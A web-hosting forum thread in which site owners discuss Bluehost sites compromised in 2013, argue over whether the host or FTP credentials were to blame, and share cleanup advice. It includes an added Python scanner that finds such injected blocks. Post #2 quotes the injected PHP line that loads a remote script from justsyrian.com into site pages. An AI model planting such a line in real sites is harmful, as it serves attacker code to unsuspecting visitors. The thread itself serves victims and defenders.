Thread: Was your BH site hacked inserting code from justsyrian.com and mytaxhelpattorney.com?

  1. #1
    Join Date
    Dec 2012
    Posts
    8

    One of my sites was somehow hacked and is calling code from justsyrian.com and mytaxhelpattorney.com which are also hosted by Bluehost.
    I was just wondering if anybody else has similar problems?

  2. #2
    Join Date
    Apr 2008
    Location
    Washington
    Posts
    47

    Yup, I was hacked by them too. See this thread for other testimonials on this case: https://drupal.org/node/2057413

    So has anyone reported these people? From what I have gathered this is a Bluehost vulnerability issue. I know sometimes it's the CMS that gets hacked, but what are the odds of pretty much every case being Bluehost only? Don't believe me? Do a search on the code below. Think about it, what better way to hack a host than to hack the one you're the most familiar with. Why they wouldn't watch their own backs, I don't know. Maybe they are small time hackers thinking people wouldn't say much about it.

    For those curious here is the code they injected on my site:

    #b3c0a9#
    @print("<script src=\"http://justsyrian.com/images/taiyYbKM.php\" ></script>");
    #/b3c0a9#

  3. #3
    Join Date
    Mar 2006
    Location
    Florida
    Posts
    79

    How and where did you find the code? Was it appearing on the page itself?
    Lee

  4. #4
    Join Date
    Apr 2008
    Location
    Washington
    Posts
    47

    I first noticed that my template was slightly broken. My site was and is still under template remaking so I figured it was an error on my part. But then I started seeing code like "#b3c0a9#" in the bottom of the site. I checked my other sites which had the same code! I instantly knew what was going on.

    Some code was injected into the template (I removed that part) but other pieces were placed inside the Joomla admin panel which I haven't figured out. At first I considered the folks of justsyrian to be possibly innocent (as in framed) but did a further investigation on them. One of their pages mentioned wanting as many links as possible. But the real evidence is that the script link (as seen above) used to go to a blank page or in other words a restricted script. Now it shows up as a 404 page to cover their tracks. I checked their error log as seen here and found an interesting path called "justsyrian/images/css.php". Familiar? I think they were using a PHP script to somehow hijack CSS files (which seem to be the affected files so far). And now you will see that that script is gone too but we now know it existed by looking in the error log. And it just so happens to have a time stamp! (06-Aug-2013) which is right around the time of when many Bluehost customers got hacked with a CSS print statement to their site. I think we've got a case on these guys. Perhaps a warning? Even with this evidence alone we have enough probable cause to know something's fishy here.
    Last edited by JoshLewis; 08-18-2013 at 01:13 AM.
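
A scanner for the marker-delimited block quoted in post #2, as an added example that is not part of any post in this thread. It assumes other infected files carry the same `#tag# ... #/tag#` shape with a different 6-hex-digit tag; the function names, the extension list and the sample file are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Paired marker block as quoted in this thread: "#b3c0a9#" ... "#/b3c0a9#".
# Assumption: other infected files use the same shape with a different
# 6-hex-digit tag, so the tag is matched generically and back-referenced.
BLOCK = re.compile(rb"#([0-9a-f]{6})#(.*?)#/\1#", re.DOTALL)
SCRIPT_SRC = re.compile(rb"<script[^>]+src=\\?[\"']([^\"'\\]+)", re.IGNORECASE)
EXTENSIONS = {".php", ".html", ".htm", ".js", ".css", ".tpl"}


def find_injections(data: bytes):
    """Return (tag, [script URLs]) for every marker-delimited block in data."""
    hits = []
    for m in BLOCK.finditer(data):
        urls = [u.decode("latin-1") for u in SCRIPT_SRC.findall(m.group(2))]
        hits.append((m.group(1).decode(), urls))
    return hits


def strip_injections(data: bytes) -> bytes:
    """Return data with every marker-delimited block removed."""
    return BLOCK.sub(b"", data)


def scan_tree(root):
    """Map each web file under root that contains a block to its findings."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in EXTENSIONS:
            hits = find_injections(path.read_bytes())
            if hits:
                report[str(path)] = hits
    return report


# Constructed sample: a template footer carrying the block quoted in post #2.
SAMPLE = (b"<?php include 'footer.php'; ?>\n#b3c0a9#\n"
          b'@print("<script src=\\"http://justsyrian.com/images/taiyYbKM.php\\" ></script>");\n'
          b"#/b3c0a9#\n</body>\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        Path(d, "index.php").write_bytes(SAMPLE)
        Path(d, "clean.css").write_bytes(b"body { color: #b3c0a9; }\n")
        for name, hits in scan_tree(d).items():
            print(name, hits)
```

A clean result covers only files on disk with this marker shape; post #4 reports further pieces inside the Joomla admin panel, which this scan does not inspect.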

  5. #5
    Join Date
    Jul 2013
    Posts
    13

    That's not a valid assumption to make especially since there are accounts that are not affected at all - like mine. Hacks are 99.9999% the fault of the software you install or the permissions on your folders/files.

  6. #6
    Join Date
    Apr 2008
    Location
    Washington
    Posts
    47

    Your argument is flawed. To say that everyone wasn't hacked doesn't mean that we necessarily did something wrong. It's funny that all at the same time all of my sites on Bluehost got hacked all at once, but my other site on SiteGround was not hacked in the slightest bit. One might argue "the hacker didn't know about the other site?". I have links back to my personal site (the one on SiteGround) which would make it way easier to find. It is way more likely for my personal site to have been hacked than the others considering that there are fewer links to them and one of them isn't even referenced to the others.

    And if we take the "it's your file permissions fault" argument I installed the software via SimpleScripts which one of the test sites was almost completely fresh. I was using the latest versions of the CMS.

    Why is it that these hackers only hacked Bluehost accounts? I've looked through all the hack cases involving justsyrian which only affected Bluehost customers. Shall I bring up each individual case? Part of the reason I'm bringing up this case is that justsyrian.com's hosting account should be evaluated.

  7. #7
    Join Date
    Jan 2013
    Posts
    1

    99.9% of cases we see involving code injections like the one mentioned above are due to a compromised FTP account on your hosting account. How does it get compromised? Several different ways. It could have just been a brute force against all accounts on that particular server, or whoever accesses the sites via FTP has a virus, trojan or keylogger installed on their local machine. In cases like this, we always tell people to scan their local machines with at LEAST two separate virus scanners (many offer free versions such as AVG and Malwarebytes that you can use in addition to what you may already have). Then to change all related passwords, using 8-12 RANDOM alphanumeric characters and include at least 1 symbol such as !,@,$,&, *, etc.

  8. #8

    First of all, the code doesn't mean that justsyrian hacked your site. More likely, justsyrian is also hacked and some code is injected to their site which is being used to call something else. It is not as simple as you imagine.

    Believe me, it is not just Bluehost that is getting hacked. I own 5-6 hosting accounts on various hosts and have used more than 10 hosts in the last 6-7 years and I can confirm this. Some hosts react better, like helping you clean up the site etc, and that is something in my opinion Bluehost isn't helpful. Otherwise, there is nothing specifically unsecure about Bluehost - these are typical LAMP servers with cPanel and most hosts have similar setup.

    From my experience, the source of most trojans / hacking is a compromised desktop which people use to access their hosting account. Again, I run a web development firm and the first thing I ask the clients is to clean up their system, even before changing cPanel passwords. Second issue is outdated CMS like WordPress. For every OS script, there are going to be known security issues and it is important that you keep it updated.

    I recommend you check your FTP logs and you are most likely to see FTP connections from dates and IPs you are not aware of. Keep your local system clean, don't save passwords on FTP clients and upgrade all scripts. Also make sure that you change all your passwords.
    Design is not just what it looks like and feels like. Design is how it works.